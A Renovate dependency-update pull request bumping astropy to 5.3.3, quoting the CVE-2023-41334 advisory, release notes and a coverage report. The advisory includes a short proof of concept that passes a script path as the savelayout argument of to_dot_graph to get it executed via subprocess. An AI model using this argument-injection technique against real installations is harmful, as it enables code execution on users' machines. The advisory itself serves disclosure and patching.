
chore(deps): update dependency astropy to v5.3.3 [security] #533

Status: Open. Wants to merge 1 commit into base: main.

Conversation

renovate[bot] (Contributor) commented Mar 18, 2024

Mend Renovate

This PR contains the following updates:

Package   Change
astropy   5.2.2 -> 5.3.3

GitHub Vulnerability Alerts

CVE-2023-41334

Summary

RCE due to improper input validation in TransformGraph().to_dot_graph function

Details

Due to improper input validation, a malicious user can provide a command or a script file as the value of the savelayout argument, which will be placed as the first value in a list of arguments passed to subprocess.Popen.
https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539
Although an error will be raised, the command or script will be executed successfully.

PoC

$ cat /tmp/script
#!/bin/bash
echo astrorce > /tmp/poc.txt
$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
    stdout, stderr = proc.communicate(dotgraph)
  File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
    input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>> 
$ cat /tmp/poc.txt
astrorce

Impact

code execution on the user's machine


Release Notes

astropy/astropy (astropy)

v5.3.3

Bug Fixes

astropy.coordinates
^^^^^^^^^^^^^^^^^^^

  • TransformGraph.to_dot_graph() now throws an exception for invalid savelayout.

astropy.cosmology
^^^^^^^^^^^^^^^^^

  • The exponent of w0wzCDM functions in inv_efunc has been corrected to 3, from -3. [#15224]

astropy.modeling
^^^^^^^^^^^^^^^^

  • Astropy modeling can filter non-finite data values using the filter_non_finite
    keyword argument in a fitter call. Now when filter_non_finite is True,
    non-finite weights will also be filtered to prevent crashes in LevMarLSQFitter. [#15215]

astropy.units
^^^^^^^^^^^^^

  • Fixed astropy.units.Quantity's implementation of numpy.nanmedian(),
    where for Numpy >= 1.25 an exception was raised for some array shapes and axis
    combinations. [#15228]

Other Changes and Additions

  • v5.3.x will not support NumPy 2.0 or later. [#15234]

v5.3.2

Bug Fixes

astropy.coordinates
^^^^^^^^^^^^^^^^^^^

  • Fixed import when called with Python -OO flag. [#15037]

astropy.nddata
^^^^^^^^^^^^^^

  • Fix for collapse operations on NDData without masks or units. [#15082]

astropy.units
^^^^^^^^^^^^^

  • Modified the implementation of np.power() for instances of Quantity to
    allow any array as the second operand if all its elements have the same value. [#15101]

v5.3.1

Bug Fixes

astropy.cosmology
^^^^^^^^^^^^^^^^^

  • The exponent in w0wzCDM.de_density_scale has been corrected to 3, from -3. [#14991]

astropy.io.fits
^^^^^^^^^^^^^^^

  • Fix crash when a PrimaryHDU has a GROUPS keyword with a non-boolean value (i.e.
    not a random-groups HDU). [#14998]

  • Fixed a bug that caused Cutout2D to not work correctly with CompImageHDU.section. [#14999]

  • Fixed a bug that caused compressed images with TFORM missing the optional '1' prefix to not be readable. [#15001]

astropy.modeling
^^^^^^^^^^^^^^^^

astropy.nddata
^^^^^^^^^^^^^^

  • Restore bitmask propagation behavior in NDData.mask, plus a fix
    for arithmetic between masked and unmasked NDData objects. [#14995]

astropy.table
^^^^^^^^^^^^^

  • Fix a bug where table indexes were not using a stable sort order. This was causing the
    order of rows within groups to not match the original table order when an indexed table
    was grouped. [#14907]

astropy.units
^^^^^^^^^^^^^

  • In VOunits, "pix", "au", "a", and "ct" are removed from the list of deprecated units. [#14885]

v5.3

Bug Fixes

astropy.io.misc
^^^^^^^^^^^^^^^

  • Updated astropy.io.misc.yaml so dump() with a numpy object array or load() with YAML representing a Numpy object array both raise TypeError. This prevents problems like a segmentation fault. [#15373]

astropy.io.votable
^^^^^^^^^^^^^^^^^^

  • Fixed a bug in convert_to_writable_filelike where GzipFile was not
    closed properly. [#15359]

astropy.units
^^^^^^^^^^^^^

  • In VOUnit, the spaces around the slash were removed in the formatting of
    fractions, and fractional powers now also use the "**" operator. [#15282]

  • We now ensure that the unit u.cgs.cm is just an alias of u.si.cm,
    instead of a redefinition. This ensures that u.Unit("cm") / u.cm
    will reliably cancel to dimensionless (instead of some "cm / cm"). [#15368]

astropy.utils
^^^^^^^^^^^^^

  • For Masked, np.ptp and the .ptp() method now properly account for
    the mask, ensuring the result is identical to subtracting the maximum and
    minimum (with the same arguments). [#15380]

Other Changes and Additions

  • Compatibility with Python 3.12. [#14784]

  • Replaced the URL of IETF_LEAP_SECOND_URL because the original is now
    defunct and IETF now defers to IANA for such look-up. [#15421]


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR has been generated by Mend Renovate. View repository job log here.
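As an added defender's illustration of the advisory quoted above (not astropy's own code and not the 5.3.3 patch itself): the unchecked pattern in which whatever savelayout holds becomes argv[0] of the Graphviz process, beside an allowlist check that refuses anything that is not a known layout engine, so a path such as /tmp/script is rejected before subprocess ever runs. The engine names, the argv shape (engine plus -T<format>), and the separate handling of the "plain" layout are assumptions made for this example.

```python
import subprocess

# Assumed allowlist: Graphviz's common layout programs. Only these names may
# ever be handed to subprocess as the program to run.
GRAPHVIZ_LAYOUTS = frozenset({"dot", "neato", "fdp", "sfdp", "twopi", "circo"})


def build_argv_unchecked(savelayout, saveformat=None):
    """Vulnerable pattern from the advisory: no validation, so a script path
    or command name passed as savelayout is executed as argv[0]."""
    args = [savelayout]
    if saveformat is not None:
        args.append("-T" + saveformat)
    return args


def build_argv_checked(savelayout, saveformat=None):
    """Hardened pattern: argv[0] must be one of the allowlisted engines.
    A plain membership test also rejects './dot', '/usr/bin/dot' and
    anything with shell metacharacters, since none of those are in the set."""
    if not isinstance(savelayout, str) or savelayout not in GRAPHVIZ_LAYOUTS:
        raise ValueError(
            f"invalid savelayout {savelayout!r}; expected one of "
            f"{sorted(GRAPHVIZ_LAYOUTS)} or 'plain'"
        )
    # The output format is also user-controlled; keep it to a bare token.
    if saveformat is not None and not saveformat.isalnum():
        raise ValueError(f"invalid saveformat {saveformat!r}")
    return [savelayout, "-T" + saveformat] if saveformat else [savelayout]


def render_graph(dotgraph, savefn, savelayout="dot", saveformat="ps"):
    """Write dotgraph to savefn. 'plain' writes the DOT text directly
    (assumed behaviour); any other layout is validated, then run. The DOT
    text is encoded to bytes first, which is the mismatch behind the
    TypeError seen in the advisory's traceback."""
    if savelayout == "plain":
        with open(savefn, "w", encoding="utf-8") as f:
            f.write(dotgraph)
        return 0
    argv = build_argv_checked(savelayout, saveformat)  # raises before any Popen
    proc = subprocess.run(argv, input=dotgraph.encode("utf-8"),
                          capture_output=True, check=False)
    if proc.returncode != 0:
        raise OSError("problem running graphviz:\n" + proc.stderr.decode())
    with open(savefn, "wb") as f:
        f.write(proc.stdout)
    return proc.returncode
```

render_graph needs a Graphviz binary on PATH for non-plain layouts; the two argv builders run with no dependencies and show the difference the 5.3.3 entry "throws an exception for invalid savelayout" refers to.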

renovate bot added the label "dependencies" (Pull requests that update a dependency file) on Mar 18, 2024

codecov bot commented Mar 18, 2024

Codecov Report

All modified and coverable lines are covered by tests ✅

Project coverage is 18.47%. Comparing base (7406a2a) to head (d56f675).

Additional details and impacted files
@@           Coverage Diff           @@
##             main     #533   +/-   ##
=======================================
  Coverage   18.47%   18.47%           
=======================================
  Files          29       29           
  Lines        3631     3631           
  Branches      477      477           
=======================================
  Hits          671      671           
  Misses       2951     2951           
  Partials        9        9           

